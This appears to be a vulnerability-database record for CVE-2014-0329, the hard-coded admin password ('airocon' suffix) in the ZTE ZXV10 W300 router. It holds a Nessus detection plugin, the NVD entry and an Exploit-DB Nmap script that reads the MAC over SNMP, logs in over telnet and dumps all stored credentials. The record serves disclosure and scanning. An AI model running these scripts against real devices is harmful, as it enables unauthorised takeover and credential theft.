"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0329"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/h:zte:zxv10_w300"], "id": "ZTE_ZXV10_BACKDOOR.NASL", "href": "https://www.tenable.com/plugins/nessus/72813", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72813);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0329\");\n script_bugtraq_id(65310);\n script_xref(name:\"EDB-ID\", value:\"31527\");\n\n script_name(english:\"ZTE ZXV10 W300 Wireless Router Hard-coded Password\");\n script_summary(english:\"Tries to login using hard-coded credentials\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is using a known set of hard-coded credentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to login to the remote device using a known hard-coded\npassword (prepended with a portion of the device's MAC address obtained\nfrom an SNMP request) for the admin account. Attackers can exploit this\nvulnerability to gain full control of the device.\");\n # http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aad205ef\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.kb.cert.org/vuls/id/228886/\");\n script_set_attribute(attribute:\"solution\", value:\n\"There is no known fix. As a workaround, use firewall rules to block\nSNMP and telnet access.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0329\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:zte:zxv10_w300\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"snmp_settings.nasl\", \"find_service2.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"snmp_func.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\ncommunity = get_kb_item(\"SNMP/community\");\nif (!community) community = 'public';\n\nport = get_kb_item(\"SNMP/port\");\nif (!port) port = 161;\n\nif (!get_udp_port_state(port)) audit(AUDIT_PORT_CLOSED, \"UDP\", port);\n\nsoc = open_sock_udp(port);\nif (!soc) audit(AUDIT_SOCK_FAIL, port, \"UDP\");\n\nmac = NULL;\n\nres = snmp_request (socket:soc, community:community, oid:\"1.3.6.1.2.1.2.2.1.6.10000\");\n\nif (!isnull(res) && strlen(res) == 6)\n mac = hexstr(res);\n\nif (isnull(mac) && islocalnet())\n mac = get_kb_item('ARP/mac_addr');\n\nif (isnull(mac)) exit(0, 'Failed to determine the MAC address of the remote device.');\n\npassword = substr(toupper(str_replace(string:mac, find:':', replace:'')), 8, 11) + 'airocon';\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:\"admin\",\n password:password,\n unix:FALSE,\n cmd:\"show status\",\n cmd_regex:\"(System[^\\$]*LAN Configuration[^\\$]*WAN Configuration[^\\$]*)\\$\",\n out_regex_group: 1,\n check_telnet: TRUE,\n port:port,\n svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n report = '\\nNessus was able to login using the following credentials : \\n' +\n '\\n Username : admin' +\n '\\n Password : ' + password + '\\n' +\n default_account_report(cmd:\"show status\");\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report, proto:\"udp\");\n }\n}\nif(affected) exit(0);\n\n# If no SSH ports were found to be vulnerable, try telnet.\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:\"admin\",\n password:password,\n unix:FALSE,\n cmd:\"show status\",\n cmd_regex:\"(System[^\\$]*LAN Configuration[^\\$]*WAN Configuration[^\\$]*)\\$\",\n out_regex_group: 1,\n check_telnet: TRUE,\n port:port,\n svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n report = '\\nNessus was able to login using the following credentials : \\n' +\n '\\n Username : admin' +\n '\\n Password : ' + password + '\\n' +\n default_account_report(cmd:\"show status\");\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report, proto:\"udp\");\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-02-09T10:03:44", "description": "The TELNET service on the ZTE ZXV10 W300 router 2.1.0 has a hardcoded password ending with airocon for the admin account, which allows remote attackers to obtain administrative access by leveraging knowledge of the MAC address characters present at the beginning of the password.", "cvss3": {}, "published": "2014-02-04T05:39:00", "type": "cve", "title": "CVE-2014-0329", "cwe": ["CWE-255"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0329"], "modified": "2017-08-29T01:34:00", "cpe": ["cpe:/h:zte:zxv10_w300:2.1.0"], "id": "CVE-2014-0329", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0329", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:h:zte:zxv10_w300:2.1.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-08-16T08:32:19", "description": "", "cvss3": {}, "published": "2014-02-09T00:00:00", "type": "exploitdb", "title": "ZTE ZXV10 W300 Router - Hard-Coded Credentials", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2014-0329", "CVE-2014-0329"], "modified": "2014-02-09T00:00:00", "id": "EDB-ID:31527", "href": "https://www.exploit-db.com/exploits/31527", "sourceData": "# Exploit Title: ZTE ZXV10 W300 router contains hardcoded credentials\r\n# Date: 03 Feb 2014\r\n# Exploit Author: Cesar Neira\r\n# Vendor Homepage: http://wwwen.zte.com.cn/\r\n# Version: ZTE ZXV10 W300 v2.1\r\n# CVE : CVE-2014-0329\r\n# Dork (Shodan): Basic realm=\"index.htm\"\r\n# References:\r\nhttp://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html\r\n\r\n\r\nlocal nmap = require \"nmap\"\r\nlocal stdnse = require \"stdnse\"\r\nlocal snmp = require \"snmp\"\r\nlocal vulns = require \"vulns\"\r\n\r\ndescription = [[\r\nZTE ZXV10 W300 router contains hardcoded credentials that are useable for the\r\ntelnet service on the device. The username is \"admin\" and the password is\r\n\"XXXXairocon\" where \"XXXX\" is the last four characters of the device's MAC\r\naddress. The MAC address is obtainable over SNMP with community string public.\r\n]]\r\nauthor = \"Cesar Neira\"\r\nlicense = \"Same as Nmap--See http://nmap.org/book/man-legal.html\"\r\ncategories = {\"vuln\", \"exploit\", \"intrusive\"}\r\n\r\n---\r\n--\r\n-- @usage nmap -sU -sS -p U:161,T:23 --script=airocon example.org\r\n-- @output\r\n-- PORT STATE SERVICE\r\n-- 23/tcp open telnet\r\n-- 161/udp open|filtered snmp\r\n-- \r\n-- Host script results:\r\n-- | airocon: \r\n-- | VULNERABLE:\r\n-- | ZTE ZXV10 W300 router contains hardcoded credentials\r\n-- | State: VULNERABLE (Exploitable)\r\n-- | IDs: CVE:CVE-2014-0329\r\n-- | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)\r\n-- | Description:\r\n-- | ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet\r\n-- | service on the device. The username is \"admin\" and the password is \"XXXXairocon\"\r\n-- | where \"XXXX\" is the last four characters of the device's MAC address. The MAC address\r\n-- | is obtainable over SNMP with community string public.\r\n-- | Disclosure date: 2014-2-3\r\n-- | Exploit results:\r\n-- | admin:1234\r\n-- | support:1234\r\n-- | admin:0E91airocon\r\n-- | References:\r\n-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0329\r\n-- | http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html\r\n-- |_ http://www.kb.cert.org/vuls/id/228886\r\n\r\n-- @args community SNMP community (Default: public)\r\n--\r\n---\r\n\r\n\r\nlocal DEFAULT_COMMUNITY = \"public\"\r\n\r\n\r\nhostrule = function(host)\r\n local snmp_port, telnet_port\r\n \r\n snmp_port = nmap.get_port_state(host, {number=161, protocol=\"udp\"})\r\n if not snmp_port and not (snmp_port.state == \"open\" or snmp_port.state == \"open|filtered\") then\r\n return false\r\n end\r\n \r\n telnet_port = nmap.get_port_state(host, {number=23, protocol=\"tcp\"})\r\n if not telnet_port and not telnet_port.state == \"open\" then\r\n return false\r\n end\r\n \r\n return true\r\nend\r\n\r\n\r\nlocal get_mac = function(host, community)\r\n\tlocal socket, status, response\r\n\t\r\n\tsocket = nmap.new_socket(\"udp\")\r\n\tsocket:set_timeout(5000)\r\n\r\n\tstatus, response = socket:connect(host, 161)\r\n\t\r\n\tif not status then\r\n\t socket:close()\r\n\t return status, response\r\n\tend\r\n\t\r\n\tlocal payload, request\r\n\r\n\trequest = snmp.buildGetRequest({}, \".1.3.6.1.2.1.2.2.1.6.10000\")\r\n\tpayload = snmp.encode(snmp.buildPacket(request, 0, community))\r\n\t\r\n\tstatus, response = socket:send(payload)\r\n\t\r\n\tif not status then\r\n\t socket:close()\r\n\t return status, response\r\n\tend\r\n\t\r\n status, response = socket:receive_bytes(1)\r\n \r\n if not status then\r\n socket:close()\r\n return status, response\r\n end\r\n \r\n socket:close()\r\n \r\n local result\r\n\tresult = snmp.fetchFirst(response)\r\n \r\n if not result then\r\n return false, \"Unexpected response value.\"\r\n end\r\n \r\n return true, stdnse.tohex(result)\r\nend\r\n\r\n\r\nlocal dump_creds = function(host, user, password)\r\n local socket, status, response\r\n \r\n socket = nmap.new_socket(\"tcp\")\r\n socket:set_timeout(5000)\r\n \r\n status, response = socket:connect(host, 23)\r\n \r\n if not status then\r\n socket:close()\r\n\t return status, response\r\n\tend\r\n\t\r\n\tlocal payload\r\n\tpayload = user .. \"\\r\" .. password .. \"\\rsh\\rlogin show\\rexit\\r\"\r\n\t\r\n\tstatus, response = socket:send(payload)\r\n\t\r\n\tif not status then\r\n\t socket:close()\r\n\t return status, response\r\n\tend\r\n\t\r\n\tstatus, response = socket:receive_buf(\"exit\", false)\r\n\t\r\n\tif not status then\r\n\t socket:close()\r\n\t return status, response\r\n\tend\r\n\t\r\n\tsocket:close()\r\n\t\r\n\treturn true, response\r\nend\r\n\r\n\r\nlocal parse_response = function(response)\r\n local index\r\n \r\n\tindex = string.find(response, \"Username +Password +Priority\")\r\n\t\r\n\tif not index then\r\n\t return false, \"Unexpected response value.\"\r\n\tend\r\n\r\n\tindex = string.find(response, \"\\r\\n\", index) + 2\r\n\tresponse = string.sub(response, index)\r\n\r\n local result, endl, line\r\n result = {}\r\n\t\r\n\tindex = 0\r\n\tendl = string.find(response, \"\\r\\n\", index)\r\n\r\n\twhile endl do\r\n\t line = string.sub(response, index, endl)\r\n\t line = string.gsub(line, \"\\r\", \"\")\r\n line = string.gsub(line, \"^ +\", \"\")\r\n line = string.gsub(line, \" +$\", \"\")\r\n line = string.gsub(line, \" +\", \" \")\r\n \r\n local user, pass, prio\r\n for user, pass, prio in string.gmatch(line, \"([^ ]+) ([^ ]+) ([^ ]+)\") do\r\n local aux = {}\r\n aux['username'] = user\r\n aux['password'] = pass\r\n aux['priority'] = prio\r\n table.insert(result, aux)\r\n end\r\n\t \r\n\t index = endl + 2\r\n\t endl = string.find(response, \"\\r\\n\", index)\r\n\tend\r\n\t\r\n return true, result\r\nend\r\n\r\n\r\naction = function(host)\r\n local vuln = {\r\n title = \"ZTE ZXV10 W300 router contains hardcoded credentials\",\r\n state = vulns.STATE.NOT_VULN,\r\n IDS = {CVE = 'CVE-2014-0329'},\r\n risk_factor = \"High\",\r\n scores = {\r\n CVSSv2 = \"9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)\",\r\n },\r\n description = [[\r\nZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet\r\nservice on the device. The username is \"admin\" and the password is \"XXXXairocon\"\r\nwhere \"XXXX\" is the last four characters of the device's MAC address. The MAC address\r\nis obtainable over SNMP with community string public.]],\r\n references = {\r\n \"http://www.kb.cert.org/vuls/id/228886\",\r\n \"http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html\"\r\n },\r\n dates = {\r\n disclosure = {year = 2014, month = 2, day = 3},\r\n },\r\n exploit_results = {},\r\n }\r\n\r\n local community\r\n community = stdnse.get_script_args(SCRIPT_NAME .. \".community\") or DEFAULT_COMMUNITY\r\n \r\n local status, response\r\n \r\n status, response = get_mac(host, community) \r\n if not status then\r\n return response\r\n end\r\n \r\n local password\r\n password = string.upper(string.sub(response, 9)) .. \"airocon\"\r\n \r\n status, response = dump_creds(host, \"admin\", password)\r\n if not status then\r\n return response\r\n end\r\n \r\n status, response = parse_response( response )\r\n if not status then\r\n return response\r\n end\r\n \r\n vuln.state = vulns.STATE.EXPLOIT\r\n for _, data in pairs(response) do\r\n table.insert(vuln.exploit_results, data.username .. \":\" .. data.password)\r\n end\r\n \r\n return vulns.Report:new(SCRIPT_NAME, host):make_output(vuln)\r\nend", "sourceHref": "https://www.exploit-db.com/download/31527", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}

ZTE ZXV10 W300 Router - Hardcoded Credentials

Description

Related